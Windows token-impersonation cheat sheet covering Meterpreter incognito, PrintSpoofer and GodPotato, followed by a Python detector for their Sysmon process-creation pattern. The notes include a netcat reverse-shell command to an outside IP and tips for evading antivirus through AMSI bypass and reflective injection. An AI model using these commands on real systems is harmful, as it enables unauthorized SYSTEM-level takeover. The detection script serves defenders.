Impersonate Token

Meterpreter Incognito

meterpreter > load incognito

# list all tokens
meterpreter > list_tokens -u

# impersonate a token
meterpreter > impersonate_token <complete username>

SeImpersonatePrivilege

If antivirus is present and you are able to bypass AMSI, it is better to use Invoke-ReflectivePEInjection to run printspoofer.exe or godpotato.exe.

The tricky part is when the exe needs arguments; the tip is to modify the exe and remove the arguments so that it directly executes a reverse shell or something else.

This Meterpreter trick will make your life easier:

https://hacker-mind.gitbook.io/hacker-mind/metasploit/meterpreter-tricks#manage-multi-session

whoami /priv

# look for SeImpersonatePrivilege in the output

PrintSpoofer

Use this release -> https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

If you have an interactive shell, you can create a new SYSTEM process in your current console.

Use case: bind shell, reverse shell, psexec.py, etc.

.\PrintSpoofer64.exe -i -c cmd

or

If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

Use case: WinRM, WebShell, wmiexec.py, smbexec.py, etc.

.\PrintSpoofer64.exe -c "C:\Windows\Tasks\nc64.exe 10.10.13.37 1337 -e cmd"

God Potato (latest one)

.\GodPotato-NET4.exe -cmd "cmd /c whoami"
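Defender-side counterpart, added here and not part of the original notes: both PrintSpoofer and GodPotato make a low-privileged process spawn a SYSTEM child, which stands out in process-creation telemetry. The script below runs over constructed Sysmon Event ID 1 records (JSON lines) and flags SYSTEM children whose parent ran as a different account; it assumes the Sysmon ParentUser field is present (added in recent Sysmon versions), and the sample events are invented.

```python
import json

SYSTEM_ACCOUNT = "NT AUTHORITY\\SYSTEM"

# Constructed Sysmon Event ID 1 (ProcessCreate) records, one JSON object per
# line. They are invented for this example, not captured telemetry.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Windows\\System32\\services.exe", "ParentUser": "NT AUTHORITY\\SYSTEM"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "User": "LAB\\alice", "ParentImage": "C:\\Windows\\explorer.exe", "ParentUser": "LAB\\alice"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\Users\\alice\\PrintSpoofer64.exe", "ParentUser": "LAB\\alice"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "User": "NT AUTHORITY\\SYSTEM", "ParentImage": "C:\\inetpub\\wwwroot\\GodPotato-NET4.exe", "ParentUser": "IIS APPPOOL\\DefaultAppPool"}
{"EventID": 3, "Image": "C:\\Windows\\System32\\cmd.exe", "User": "NT AUTHORITY\\SYSTEM"}
"""


def is_system(account: str) -> bool:
    """Case-insensitive match on the SYSTEM account name Sysmon reports."""
    return account.strip().upper() == SYSTEM_ACCOUNT


def suspicious_elevations(jsonl: str) -> list:
    """Return ProcessCreate events where a non-SYSTEM parent spawned a SYSTEM child.

    Legitimate SYSTEM processes descend from SYSTEM parents (services.exe,
    svchost.exe, ...), so the user mismatch is the signal; the potato family
    produces exactly this shape. Events without ParentUser (older Sysmon
    schemas) are skipped rather than guessed at.
    """
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if event.get("EventID") != 1 or "ParentUser" not in event:
            continue
        child_user, parent_user = event.get("User", ""), event["ParentUser"]
        if is_system(child_user) and not is_system(parent_user):
            hits.append({
                "parent_image": event.get("ParentImage", ""),
                "parent_user": parent_user,
                "child_image": event.get("Image", ""),
            })
    return hits


if __name__ == "__main__":
    for hit in suspicious_elevations(SAMPLE_EVENTS):
        print(f"{hit['parent_user']} via {hit['parent_image']} -> SYSTEM {hit['child_image']}")
```

Tuning is left to the environment: any installer or management agent that legitimately launches SYSTEM children from a non-SYSTEM parent should be allowlisted by ParentImage rather than by loosening the user check.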

Reference:

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

Other Privileges

https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations
